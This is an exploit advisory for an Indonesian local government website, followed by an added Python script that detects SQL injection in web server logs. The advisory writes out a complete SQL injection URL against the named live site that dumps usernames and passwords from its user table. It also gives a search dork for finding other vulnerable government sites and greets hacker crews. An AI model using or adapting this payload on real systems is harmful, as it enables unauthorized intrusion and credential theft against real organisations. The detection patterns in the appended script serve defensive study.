Kelurahan Komet Banjarbaru Kota - SQL Injection

2020.09.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Kelurahan Komet Banjarbaru Kota - SQL Injection
# Author : ./0lleXploit-1307
# Dork : site:go.id inurl:/berita_detail.php?id=1

# Vulnerability Site
- https://kel-komet.banjarbarukota.go.id/public/berita_detail.php? id=-1%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),5,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+tb_user)*/--+-

# Greetz
- Garuda Anon Security
- Stuck Xploiter Crew
- Muslim Cyber Security
- Light Cyber Indonesia

# Contact
- Email : byte0x.id@yahoo.com
- Twitter : twitter.com/h4ndsatiz3r
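The request above places SQL in the `id` parameter of `berita_detail.php`, a value that should only ever be a number, so it stands out in web server logs. The following is an added detection example, not part of the original advisory: it assumes combined-format access logs, the log lines are constructed, and the names `check_request` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (assumed combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Sep/2020:10:00:01 +0000] "GET /public/berita_detail.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Sep/2020:10:00:05 +0000] "GET /public/berita_detail.php?id=-1%27+union+select+1,2,3,'
    '(select(0)from(information_schema.columns)),5,/*!50000(SELECT+1)*/--+- HTTP/1.1" 200 8456',
    '203.0.113.8 - - [17/Sep/2020:10:00:09 +0000] "GET /public/berita_detail.php?id=7%20 HTTP/1.1" 200 5120',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Fragments seen in the request above, matched after URL-decoding.
MARKERS = {
    "union_select": re.compile(r"union\s+select", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "versioned_comment": re.compile(r"/\*!\d{5}"),   # MySQL /*!50000 ... */
    "trailing_comment": re.compile(r"--\s"),         # "--+-" decodes to "-- -"
}


def check_request(line, param="id"):
    """Return the reasons a log line's `param` value looks like SQL injection."""
    m = REQUEST.search(line)
    if not m:
        return []
    # parse_qs URL-decodes the value and turns '+' into spaces.
    values = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).get(param, [])
    reasons = set()
    for value in values:
        # Allow-list first: a news-article id is expected to be digits only.
        if not re.fullmatch(r"\d+", value):
            reasons.add("non_numeric_id")
        reasons.update(name for name, rx in MARKERS.items() if rx.search(value))
    return sorted(reasons)


def scan(lines, param="id"):
    """Return (client_ip, reasons) for every line whose `param` is suspicious."""
    hits = []
    for line in lines:
        reasons = check_request(line, param)
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The numeric allow-list catches the third line even though it matches no marker; the same check, applied in the application together with a parameterized query, is what closes the hole rather than merely reporting it.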

